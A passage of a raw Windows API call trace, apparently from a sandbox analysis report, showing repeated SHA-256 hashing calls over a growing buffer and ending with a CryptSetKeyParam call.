(hHash=0x3396eb70, pbData=0x32e8a230, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0183.856] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83f10 [0183.856] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.857] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.857] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.857] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.857] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0183.857] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84180 [0183.857] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.857] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.857] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.858] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.858] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0183.858] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e842d0 [0183.858] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.858] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.858] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.859] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.859] CryptHashData (hHash=0x3396f6d0, pbData=0x32e8a230, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0183.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83ca0 [0183.859] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0183.859] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.859] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.859] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.859] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0183.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83d60 [0183.859] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.859] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.859] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.860] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.860] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0183.860] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83c70 [0183.860] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.860] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.860] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.861] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.861] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0183.861] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84300 [0183.861] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.861] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.861] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.861] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.861] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0183.861] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83b50 [0183.861] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.861] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.861] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.862] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.862] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0183.862] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84000 [0183.862] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.862] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.862] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.863] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.863] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0183.863] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84330 [0183.863] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.863] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.863] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.863] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.864] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0183.864] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84360 [0183.864] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.864] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.864] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0183.864] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.864] CryptHashData (hHash=0x3396ee80, pbData=0x32e8a230, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0183.864] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83e50 [0183.864] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0183.864] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0183.864] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0183.865] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.865] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0183.865] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84390 [0183.865] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.865] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0183.865] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0183.866] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.866] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0183.866] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83be0 [0183.866] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.866] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0183.866] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0183.866] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.866] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0183.866] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e844b0 [0183.866] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.866] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0183.866] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.867] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.867] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0184.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83f40 [0184.058] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0184.058] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0184.058] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0184.059] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.059] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0184.059] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84030 [0184.059] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0184.059] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0184.059] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0184.060] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.060] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0184.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83e80 [0184.060] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0184.060] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0184.060] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0184.060] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.060] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0184.061] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84600 [0184.061] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0184.061] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0184.061] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0184.061] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.061] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0184.061] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e841b0 [0184.061] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0184.061] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0184.061] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0184.062] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.062] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0184.062] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83c10 [0184.062] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0184.062] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0184.062] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0184.063] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.063] CryptHashData (hHash=0x3396f5f0, pbData=0x32e8a230, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0184.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84630 [0184.063] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0184.063] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0184.063] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0184.063] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.063] CryptHashData (hHash=0x3396ee10, pbData=0x32e8a230, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0184.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84060 [0184.063] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0184.063] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0184.063] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0184.064] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.064] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0184.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e840c0 [0184.064] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.064] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0184.064] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0184.065] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.065] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0184.065] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e845a0 [0184.065] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.065] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0184.065] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0184.065] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.065] CryptHashData (hHash=0x3396f660, pbData=0x32e8a230, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0184.065] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83ee0 [0184.065] CryptDestroyHash (hHash=0x3396f660) returned 1 [0184.065] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0184.065] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0184.066] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.066] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0184.066] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e841e0 [0184.066] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0184.066] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0184.066] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0184.067] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.067] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0184.067] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84660 [0184.067] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.067] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0184.067] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0184.067] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.067] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0184.067] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e840f0 [0184.067] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0184.067] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0184.067] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0184.068] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.068] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83b80 [0184.068] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.068] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0184.068] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0184.069] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.069] CryptHashData (hHash=0x3396f660, pbData=0x32e8a230, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84420 [0184.069] CryptDestroyHash (hHash=0x3396f660) returned 1 [0184.069] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0184.069] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0184.069] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.069] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84120 [0184.069] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.070] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0184.070] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0184.070] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.070] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0184.070] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83c40 [0184.070] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.070] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0184.070] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0184.071] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.071] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0184.071] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84690 [0184.071] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0184.071] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0184.071] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0184.071] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.071] CryptHashData (hHash=0x3396ea20, pbData=0x32e8a230, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0184.071] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84510 [0184.071] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0184.072] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0184.072] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0184.072] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.072] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0184.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83af0 [0184.072] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.072] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0184.072] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0184.073] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.073] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0184.073] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e83f70 [0184.073] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0184.073] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0184.073] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0184.073] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.073] CryptHashData (hHash=0x3396ecc0, pbData=0x32e8a230, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0184.074] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0184.074] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0184.074] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0184.074] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.074] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0184.074] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.074] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0184.074] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0184.075] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0184.075] CryptHashData (hHash=0x3396f4a0, pbData=0x32e8a230, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0184.075] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0184.075] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0184.077] CryptSetKeyParam (hKey=0x3396ecc0, dwParam=0x4, pbData=0xce034*=0x1, dwFlags=0x0) returned 1 